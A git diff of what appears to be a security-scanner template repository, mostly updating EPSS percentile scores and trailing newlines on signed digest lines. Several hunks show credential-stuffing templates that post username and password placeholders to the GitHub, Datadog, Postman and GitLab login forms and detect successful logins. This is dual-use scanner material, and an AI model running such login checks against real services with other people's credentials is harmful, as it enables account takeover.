.../wordpress/plugins/classic-editor.yaml | 2 +- .../wordpress/plugins/classic-widgets.yaml | 2 +- .../plugins/click-to-chat-for-whatsapp.yaml | 2 +- http/technologies/wordpress/plugins/cmb2.yaml | 2 +- http/technologies/wordpress/plugins/coblocks.yaml | 2 +- .../wordpress/plugins/code-snippets.yaml | 2 +- .../wordpress/plugins/coming-soon.yaml | 2 +- .../wordpress/plugins/complianz-gdpr.yaml | 2 +- .../wordpress/plugins/contact-form-7-honeypot.yaml | 2 +- .../wordpress/plugins/contact-form-7.yaml | 2 +- .../wordpress/plugins/contact-form-cfdb7.yaml | 2 +- .../wordpress/plugins/cookie-law-info.yaml | 2 +- .../wordpress/plugins/cookie-notice.yaml | 2 +- .../wordpress/plugins/creame-whatsapp-me.yaml | 2 +- .../plugins/creative-mail-by-constant-contact.yaml | 2 +- .../wordpress/plugins/custom-css-js.yaml | 2 +- .../wordpress/plugins/custom-fonts.yaml | 2 +- .../wordpress/plugins/custom-post-type-ui.yaml | 2 +- .../wordpress/plugins/disable-comments.yaml | 2 +- .../wordpress/plugins/disable-gutenberg.yaml | 2 +- .../wordpress/plugins/duplicate-page.yaml | 2 +- .../wordpress/plugins/duplicate-post.yaml | 2 +- .../technologies/wordpress/plugins/duplicator.yaml | 2 +- .../plugins/duracelltomi-google-tag-manager.yaml | 2 +- .../wordpress/plugins/easy-fancybox.yaml | 2 +- .../wordpress/plugins/easy-table-of-contents.yaml | 2 +- .../wordpress/plugins/easy-wp-smtp.yaml | 2 +- http/technologies/wordpress/plugins/elementor.yaml | 2 +- .../wordpress/plugins/elementskit-lite.yaml | 2 +- .../wordpress/plugins/enable-media-replace.yaml | 2 +- .../wordpress/plugins/envato-elements.yaml | 2 +- .../essential-addons-for-elementor-lite.yaml | 2 +- .../wordpress/plugins/ewww-image-optimizer.yaml | 2 +- .../plugins/facebook-for-woocommerce.yaml | 2 +- .../wordpress/plugins/fast-indexing-api.yaml | 2 +- .../plugins/favicon-by-realfavicongenerator.yaml | 2 +- http/technologies/wordpress/plugins/flamingo.yaml | 2 +- .../technologies/wordpress/plugins/fluentform.yaml | 2 +- .../wordpress/plugins/font-awesome.yaml | 2 +- .../plugins/force-regenerate-thumbnails.yaml | 2 +- .../technologies/wordpress/plugins/formidable.yaml | 2 +- .../technologies/wordpress/plugins/forminator.yaml | 2 +- .../wordpress/plugins/ga-google-analytics.yaml | 2 +- .../wordpress/plugins/gdpr-cookie-compliance.yaml | 2 +- .../plugins/google-analytics-dashboard-for-wp.yaml | 2 +- .../plugins/google-analytics-for-wordpress.yaml | 2 +- .../wordpress/plugins/google-listings-and-ads.yaml | 2 +- .../wordpress/plugins/google-site-kit.yaml | 2 +- .../plugins/google-sitemap-generator.yaml | 2 +- .../technologies/wordpress/plugins/gtranslate.yaml | 2 +- http/technologies/wordpress/plugins/gutenberg.yaml | 2 +- .../wordpress/plugins/happy-elementor-addons.yaml | 2 +- .../plugins/header-footer-code-manager.yaml | 2 +- .../wordpress/plugins/header-footer-elementor.yaml | 2 +- .../wordpress/plugins/header-footer.yaml | 2 +- .../wordpress/plugins/health-check.yaml | 2 +- .../wordpress/plugins/hello-dolly.yaml | 2 +- .../wordpress/plugins/host-webfonts-local.yaml | 2 +- http/technologies/wordpress/plugins/hostinger.yaml | 2 +- http/technologies/wordpress/plugins/imagify.yaml | 2 +- http/technologies/wordpress/plugins/imsanity.yaml | 2 +- .../plugins/insert-headers-and-footers.yaml | 2 +- .../wordpress/plugins/instagram-feed.yaml | 2 +- .../plugins/intuitive-custom-post-order.yaml | 2 +- .../technologies/wordpress/plugins/iwp-client.yaml | 2 +- .../wordpress/plugins/jetpack-boost.yaml | 2 +- http/technologies/wordpress/plugins/jetpack.yaml | 2 +- .../wordpress/plugins/kadence-blocks.yaml | 2 +- http/technologies/wordpress/plugins/kirki.yaml | 2 +- http/technologies/wordpress/plugins/leadin.yaml | 2 +- .../plugins/limit-login-attempts-reloaded.yaml | 2 +- .../wordpress/plugins/limit-login-attempts.yaml | 2 +- .../wordpress/plugins/litespeed-cache.yaml | 2 +- .../wordpress/plugins/loco-translate.yaml | 2 +- http/technologies/wordpress/plugins/loginizer.yaml | 2 +- .../technologies/wordpress/plugins/loginpress.yaml | 2 +- .../plugins/mailchimp-for-woocommerce.yaml | 2 +- .../wordpress/plugins/mailchimp-for-wp.yaml | 2 +- http/technologies/wordpress/plugins/mailpoet.yaml | 2 +- .../wordpress/plugins/maintenance.yaml | 2 +- .../wordpress/plugins/mainwp-child.yaml | 2 +- .../wordpress/plugins/malcare-security.yaml | 2 +- http/technologies/wordpress/plugins/megamenu.yaml | 2 +- http/technologies/wordpress/plugins/members.yaml | 2 +- http/technologies/wordpress/plugins/meta-box.yaml | 2 +- http/technologies/wordpress/plugins/metform.yaml | 2 +- http/technologies/wordpress/plugins/ml-slider.yaml | 2 +- .../technologies/wordpress/plugins/newsletter.yaml | 2 +- .../plugins/nextend-facebook-connect.yaml | 2 +- .../wordpress/plugins/nextgen-gallery.yaml | 2 +- .../wordpress/plugins/ninja-forms.yaml | 2 +- .../wordpress/plugins/ocean-extra.yaml | 2 +- .../wordpress/plugins/official-facebook-pixel.yaml | 2 +- .../wordpress/plugins/one-click-demo-import.yaml | 2 +- .../wordpress/plugins/optinmonster.yaml | 2 +- .../wordpress/plugins/otter-blocks.yaml | 2 +- .../wordpress/plugins/password-protected.yaml | 2 +- .../wordpress/plugins/pdf-embedder.yaml | 2 +- .../plugins/pinterest-for-woocommerce.yaml | 2 +- .../wordpress/plugins/pixelyoursite.yaml | 2 +- http/technologies/wordpress/plugins/polylang.yaml | 2 +- .../wordpress/plugins/popup-builder.yaml | 2 +- .../wordpress/plugins/popup-maker.yaml | 2 +- http/technologies/wordpress/plugins/post-smtp.yaml | 2 +- .../wordpress/plugins/post-types-order.yaml | 2 +- .../plugins/premium-addons-for-elementor.yaml | 2 +- .../wordpress/plugins/pretty-link.yaml | 2 +- .../wordpress/plugins/really-simple-captcha.yaml | 2 +- .../wordpress/plugins/really-simple-ssl.yaml | 2 +- .../wordpress/plugins/redirection.yaml | 2 +- .../wordpress/plugins/redux-framework.yaml | 2 +- .../wordpress/plugins/regenerate-thumbnails.yaml | 2 +- http/technologies/wordpress/plugins/safe-svg.yaml | 2 +- .../wordpress/plugins/seo-by-rank-math.yaml | 2 +- .../wordpress/plugins/sg-cachepress.yaml | 2 +- .../wordpress/plugins/sg-security.yaml | 2 +- .../wordpress/plugins/shortcodes-ultimate.yaml | 2 +- .../plugins/shortpixel-image-optimiser.yaml | 2 +- .../plugins/simple-custom-post-order.yaml | 2 +- http/technologies/wordpress/plugins/siteguard.yaml | 2 +- .../wordpress/plugins/siteorigin-panels.yaml | 2 +- .../wordpress/plugins/smart-slider-3.yaml | 2 +- .../wordpress/plugins/so-widgets-bundle.yaml | 2 +- .../stops-core-theme-and-plugin-updates.yaml | 2 +- .../wordpress/plugins/sucuri-scanner.yaml | 2 +- .../wordpress/plugins/svg-support.yaml | 2 +- .../wordpress/plugins/table-of-contents-plus.yaml | 2 +- .../technologies/wordpress/plugins/tablepress.yaml | 2 +- .../wordpress/plugins/taxonomy-terms-order.yaml | 2 +- .../technologies/wordpress/plugins/templately.yaml | 2 +- .../wordpress/plugins/the-events-calendar.yaml | 2 +- .../wordpress/plugins/tinymce-advanced.yaml | 2 +- .../plugins/translatepress-multilingual.yaml | 2 +- .../plugins/ultimate-addons-for-gutenberg.yaml | 2 +- .../wordpress/plugins/under-construction-page.yaml | 2 +- .../wordpress/plugins/updraftplus.yaml | 2 +- .../wordpress/plugins/use-any-font.yaml | 2 +- .../wordpress/plugins/user-role-editor.yaml | 2 +- .../plugins/velvet-blues-update-urls.yaml | 2 +- .../wordpress/plugins/w3-total-cache.yaml | 2 +- .../plugins/webp-converter-for-media.yaml | 2 +- .../wordpress/plugins/webp-express.yaml | 2 +- .../plugins/widget-importer-exporter.yaml | 2 +- .../plugins/woo-checkout-field-editor-pro.yaml | 2 +- .../wordpress/plugins/woo-variation-swatches.yaml | 2 +- .../plugins/woocommerce-gateway-stripe.yaml | 2 +- .../wordpress/plugins/woocommerce-payments.yaml | 2 +- .../plugins/woocommerce-paypal-payments.yaml | 2 +- .../woocommerce-pdf-invoices-packing-slips.yaml | 2 +- .../wordpress/plugins/woocommerce-services.yaml | 2 +- .../wordpress/plugins/woocommerce.yaml | 2 +- http/technologies/wordpress/plugins/wordfence.yaml | 2 +- .../wordpress/plugins/wordpress-importer.yaml | 2 +- .../wordpress/plugins/wordpress-seo.yaml | 2 +- http/technologies/wordpress/plugins/worker.yaml | 2 +- .../wordpress/plugins/wp-fastest-cache.yaml | 2 +- .../wordpress/plugins/wp-file-manager.yaml | 2 +- .../wordpress/plugins/wp-google-maps.yaml | 2 +- .../wordpress/plugins/wp-mail-smtp.yaml | 2 +- .../wordpress/plugins/wp-maintenance-mode.yaml | 2 +- .../wordpress/plugins/wp-migrate-db.yaml | 2 +- .../wordpress/plugins/wp-multibyte-patch.yaml | 2 +- .../wordpress/plugins/wp-optimize.yaml | 2 +- .../wordpress/plugins/wp-pagenavi.yaml | 2 +- http/technologies/wordpress/plugins/wp-reset.yaml | 2 +- .../plugins/wp-reviews-plugin-for-google.yaml | 2 +- .../wordpress/plugins/wp-rollback.yaml | 2 +- .../wordpress/plugins/wp-seopress.yaml | 2 +- .../wordpress/plugins/wp-sitemap-page.yaml | 2 +- .../technologies/wordpress/plugins/wp-smushit.yaml | 2 +- .../wordpress/plugins/wp-statistics.yaml | 2 +- .../wordpress/plugins/wp-super-cache.yaml | 2 +- .../wordpress/plugins/wp-user-avatar.yaml | 2 +- .../wordpress/plugins/wpcf7-recaptcha.yaml | 2 +- .../wordpress/plugins/wpcf7-redirect.yaml | 2 +- .../wordpress/plugins/wpforms-lite.yaml | 2 +- .../wordpress/plugins/wps-hide-login.yaml | 2 +- .../wordpress/plugins/wpvivid-backuprestore.yaml | 2 +- .../plugins/yith-woocommerce-wishlist.yaml | 2 +- .../apache/apache-druid-kafka-connect-rce.yaml | 2 +- .../shiro/shiro-deserialization-detection.yaml | 3 ++- http/vulnerabilities/gitlab/gitlab-rce.yaml | 3 ++- .../jira/jira-servicedesk-signup.yaml | 3 ++- http/vulnerabilities/joomla/rusty-joomla.yaml | 3 ++- .../jorani/jorani-benjamin-xss.yaml | 3 ++- .../other/alumni-management-sqli.yaml | 4 ++-- http/vulnerabilities/other/carrental-xss.yaml | 3 ++- http/vulnerabilities/other/chamilo-lms-sqli.yaml | 3 ++- .../other/core-chuangtian-cloud-rce.yaml | 3 ++- .../other/dixell-xweb500-filewrite.yaml | 4 ++-- http/vulnerabilities/other/flatpress-xss.yaml | 4 ++-- .../other/goanywhere-mft-log4j-rce.yaml | 4 ++-- .../other/hospital-management-xss.yaml | 3 ++- .../other/hospital-management-xss2.yaml | 3 ++- http/vulnerabilities/other/loancms-sqli.yaml | 4 ++-- .../vulnerabilities/other/panabit-ixcache-rce.yaml | 3 ++- http/vulnerabilities/other/phpldapadmin-xss.yaml | 3 ++- .../other/podcast-generator-ssrf.yaml | 3 ++- .../other/powercreator-cms-rce.yaml | 3 ++- .../other/sound4-impact-auth-bypass.yaml | 3 ++- .../other/sound4-impact-password-auth-bypass.yaml | 3 ++- http/vulnerabilities/other/umbraco-base-ssrf.yaml | 3 ++- .../other/wapples-firewall-lfi.yaml | 3 ++- http/vulnerabilities/other/yapi-rce.yaml | 4 ++-- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 3 ++- http/vulnerabilities/other/zzcms-xss.yaml | 3 ++- .../royalevent/royalevent-management-xss.yaml | 4 ++-- http/vulnerabilities/ruijie/ruijie-eg-rce.yaml | 4 ++-- http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml | 3 ++- .../tongda/tongda-arbitrary-login.yaml | 3 ++- .../vulnerabilities/tongda/tongda-auth-bypass.yaml | 3 ++- .../topsec/topsec-topapplb-auth-bypass.yaml | 3 ++- .../ecology/ecology-arbitrary-file-upload.yaml | 4 ++-- .../vulnerabilities/weaver/oa-v9-uploads-file.yaml | 3 ++- .../wordpress/3d-print-lite-xss.yaml | 3 ++- .../wordpress/3dprint-arbitrary-file-upload.yaml | 3 ++- http/vulnerabilities/wordpress/404-to-301-xss.yaml | 4 ++-- http/vulnerabilities/wordpress/age-gate-xss.yaml | 4 ++-- .../wordpress/checkout-fields-manager-xss.yaml | 4 ++-- .../wordpress/clearfy-cache-xss.yaml | 4 ++-- http/vulnerabilities/wordpress/curcy-xss.yaml | 4 ++-- .../wordpress/elex-woocommerce-xss.yaml | 4 ++-- .../wordpress/health-check-lfi.yaml | 4 ++-- .../wordpress/ldap-wp-login-xss.yaml | 3 ++- .../wordpress/modula-image-gallery-xss.yaml | 4 ++-- http/vulnerabilities/wordpress/my-chatbot-xss.yaml | 4 ++-- .../wordpress/new-user-approve-xss.yaml | 4 ++-- .../wordpress/photo-gallery-xss.yaml | 4 ++-- .../wordpress/seatreg-redirect.yaml | 3 ++- .../wordpress/seo-redirection-xss.yaml | 4 ++-- .../wordpress/shortpixel-image-optimizer-xss.yaml | 4 ++-- http/vulnerabilities/wordpress/watu-xss.yaml | 3 ++- .../wordpress/woocommerce-pdf-invoices-xss.yaml | 4 ++-- .../wordpress/wordpress-wp-cron.yaml | 4 ++-- .../wordpress/wp-all-export-xss.yaml | 4 ++-- .../wordpress/wp-code-snippets-xss.yaml | 4 ++-- .../wordpress/wp-insert-php-xss.yaml | 4 ++-- .../wordpress/wp-related-post-xss.yaml | 4 ++-- http/vulnerabilities/wordpress/wptouch-xss.yaml | 4 ++-- .../yonyou/grp-u8-uploadfiledata-fileupload.yaml | 3 ++- .../yonyou-filereceiveservlet-fileupload.yaml | 3 ++- .../yonyou/yonyou-nc-accept-fileupload.yaml | 3 ++- javascript/cves/2016/CVE-2016-8706.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/enumeration/smb-enum.yaml | 6 ++---- network/cves/2022/CVE-2022-31793.yaml | 2 +- 2363 files changed, 5041 insertions(+), 3881 deletions(-) diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml index de10d61c59..93023ed805 100644 --- a/http/cnvd/2019/CNVD-2019-19299.yaml +++ b/http/cnvd/2019/CNVD-2019-19299.yaml @@ -50,4 +50,5 @@ http: - 'contains(body_1, "htmoffice operate")' - 'contains(body_2, "Windows IP")' condition: and -# digest: 490a004630440220129cac2608f955cc940bb015a47de2d660b6f0f7e98e07d7d602ccae98dcd95702203984da9465625bc1d69ae92c873892ee5e1349e60257a4e18c7e3577456d1c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220129cac2608f955cc940bb015a47de2d660b6f0f7e98e07d7d602ccae98dcd95702203984da9465625bc1d69ae92c873892ee5e1349e60257a4e18c7e3577456d1c37:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml index d86836e8bb..3217c86934 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -45,4 +45,5 @@ http: - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and -# digest: 4b0a00483046022100e0b8a978d4631823ced989441ed9dc7f4787e0865117f3774c90e5f27393ad3b022100a2f5705860233f76a0fd9a7a6cb44ff3db36963f9c04f4d8f57b519133f77112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e0b8a978d4631823ced989441ed9dc7f4787e0865117f3774c90e5f27393ad3b022100a2f5705860233f76a0fd9a7a6cb44ff3db36963f9c04f4d8f57b519133f77112:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index e7ce4f1647..9af745be35 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -28,7 +28,6 @@ http: utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login - extractors: - type: xpath name: authenticity_token @@ -53,4 +52,5 @@ http: - type: status status: - 302 -# digest: 490a0046304402203d169c3f0cdacac46938760110666c36529dce6006c19736ebe89b88918131cf0220318ad363911110f9a85c1125f7e8ce879e3fa1f252a1cf577120cfacb4aa71a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203d169c3f0cdacac46938760110666c36529dce6006c19736ebe89b88918131cf0220318ad363911110f9a85c1125f7e8ce879e3fa1f252a1cf577120cfacb4aa71a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index db983393a6..bcda7665e7 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -25,7 +25,6 @@ http: _authentication_token={{auth_token}}&username={{username}}&password={{password}} - extractors: - type: regex name: auth_token @@ -51,4 +50,5 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100c23834bce6d4034f85481f09d589ee3f219be4de465190fba26334d49be7a618022041fcf0b7111a3f1a3ef086896a0b5d4d2d60f2601d2e67178b2ec9aff14672cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c23834bce6d4034f85481f09d589ee3f219be4de465190fba26334d49be7a618022041fcf0b7111a3f1a3ef086896a0b5d4d2d60f2601d2e67178b2ec9aff14672cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index af621bf711..fbc31dcae2 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -27,7 +27,6 @@ http: commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} - extractors: - type: xpath name: authenticity_token @@ -73,4 +72,5 @@ http: - "contains(to_lower(header), 'set-cookie: user_session=')" - "status_code==302" condition: and -# digest: 4a0a00473045022044dacf041522f5bdf2380edede0b1316819db87a4d55ccdf4439f8a5d9e4e2ca022100ccbcb59aca67fd1cb463e82c2754b9101cb895e2221a47e48b989d65ad45400b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044dacf041522f5bdf2380edede0b1316819db87a4d55ccdf4439f8a5d9e4e2ca022100ccbcb59aca67fd1cb463e82c2754b9101cb895e2221a47e48b989d65ad45400b:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index 8b77b7d7dc..2fcf8c57ab 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -51,4 +51,5 @@ http: - "contains(to_lower(body), 'identity.postman.co/continue')" - "status_code==200" condition: and -# digest: 4a0a00473045022100a5cc97815eecb4cac96601b204c3eabb0ad1e9c0d8dd7480f813f38e9014617202200422cee6d3374b8b07c6ea34ca09d7e6731d1d087a29386e8d921021835af829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a5cc97815eecb4cac96601b204c3eabb0ad1e9c0d8dd7480f813f38e9014617202200422cee6d3374b8b07c6ea34ca09d7e6731d1d087a29386e8d921021835af829:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index 54eaaf9f14..6e12d090a2 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -54,4 +54,5 @@ http: - status_code_2 == 302 - '!contains(to_lower(body_2), "invalid login")' condition: and -# digest: 4a0a00473045022100cd7dd9cc87262947bbd5b212adb57e7675f7b01102eab8aa7a098637688db6f302206039736f280ed2b9cd276dc59104b53ad7e6be58ccad1a538aa1570ce8e65e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cd7dd9cc87262947bbd5b212adb57e7675f7b01102eab8aa7a098637688db6f302206039736f280ed2b9cd276dc59104b53ad7e6be58ccad1a538aa1570ce8e65e5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index c0677895d8..a4da4a2136 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - epss-percentile: 0.9837 + epss-percentile: 0.98371 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 87e85811da..379827088f 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - epss-percentile: 0.92707 + epss-percentile: 0.92699 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 0a066b6439..af21c3a9e6 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - epss-percentile: 0.88467 + epss-percentile: 0.88466 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b6d0a451b73863153217179a44315593bd95b681bc715ca3cf3fa4c33079278b022100dfce551413fab6fff405e1a421456861de3df1661785af4e222ec2d523ada366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b6d0a451b73863153217179a44315593bd95b681bc715ca3cf3fa4c33079278b022100dfce551413fab6fff405e1a421456861de3df1661785af4e222ec2d523ada366:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index b90b345be3..41cdd81b9e 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.83041 + epss-percentile: 0.83031 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index f66236d283..80ad1b2d99 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83516 + epss-percentile: 0.83501 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 573ec3afde..6733eec1a3 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - epss-percentile: 0.88108 + epss-percentile: 0.88112 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index a05bd01d82..b2d11bcb63 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.89618 + epss-percentile: 0.89615 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 96a170913b..a117d07483 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - epss-percentile: 0.65862 + epss-percentile: 0.65861 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220673e62e802706569de01235511b09cf60ef4431d2b36cc61a6d45fc6973cd1f502207a6c3a37459c49db2959676a60c221b3e7f77999b8b3108c8fa8eada73624b9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220673e62e802706569de01235511b09cf60ef4431d2b36cc61a6d45fc6973cd1f502207a6c3a37459c49db2959676a60c221b3e7f77999b8b3108c8fa8eada73624b9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index ba359eb834..e130005724 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - epss-percentile: 0.82058 + epss-percentile: 0.82038 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 76e53cad0c..f41ef80406 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.17301 - epss-percentile: 0.95572 + epss-percentile: 0.9557 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 336bd232d9..ffb175833d 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.00827 - epss-percentile: 0.80015 + epss-percentile: 0.8 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c97811c940054824ad9d88193d234bea9144542df9f085961fad41a2f9213380221008510f7a7413eeab2204c139ebfd73a19196f156b7a9a9290cafb537c9c65af5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202c97811c940054824ad9d88193d234bea9144542df9f085961fad41a2f9213380221008510f7a7413eeab2204c139ebfd73a19196f156b7a9a9290cafb537c9c65af5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 21b79f6e39..f70626fbb0 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - epss-percentile: 0.86265 + epss-percentile: 0.86275 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 5b0eb24ab9..47c4b7b219 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.19583 - epss-percentile: 0.95794 + epss-percentile: 0.95789 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 3634940ad2..24f25df8ef 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - epss-percentile: 0.88644 + epss-percentile: 0.88645 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 